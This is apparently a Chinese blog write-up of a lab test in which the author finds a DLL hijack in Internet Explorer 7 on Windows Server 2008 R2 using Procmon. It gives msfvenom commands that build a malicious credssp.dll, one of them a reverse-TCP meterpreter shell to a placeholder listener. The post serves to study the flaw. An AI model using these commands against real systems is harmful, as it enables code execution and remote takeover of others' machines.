发布于2022年10月18日3年前 今天下午原本是想复现这篇文章里面的UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking – egre55 – thoughts on security DLL劫持。没想到我在WIndows Server 2008 R2测试的时候发现IE的DLL劫持 正文 环境:windows Server 2008 R2 IE版本:IE 7 kOTCcV.png IE文件夹里面原来的样子: kOTn91.png 先配置好Procmon kOTagP.png 重启Procmon然后打开IE,找到credssp.dll kOTLgx.md.png 当时我是抱着一试的心态,用msfvenom生成了个dll msfvenom -p windows/exec CMD="calc.exe" -f dll > credssp.dll 1 然后放入到IE的文件夹里,然后重启IE kO7F2t.md.png 测试结果: kO7Na4.gif 再次用Procmon分析 发现注册表会找这个DLL,如果找到了就执行 kO74zt.md.png credssp.dll成功被IE执行 kO7Oij.md.png msfvenom生成反弹meterpreter的dll msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > credssp.dll 1 替换掉那个弹CALC的dll kOHQTe.png
创建帐户或登录后发表意见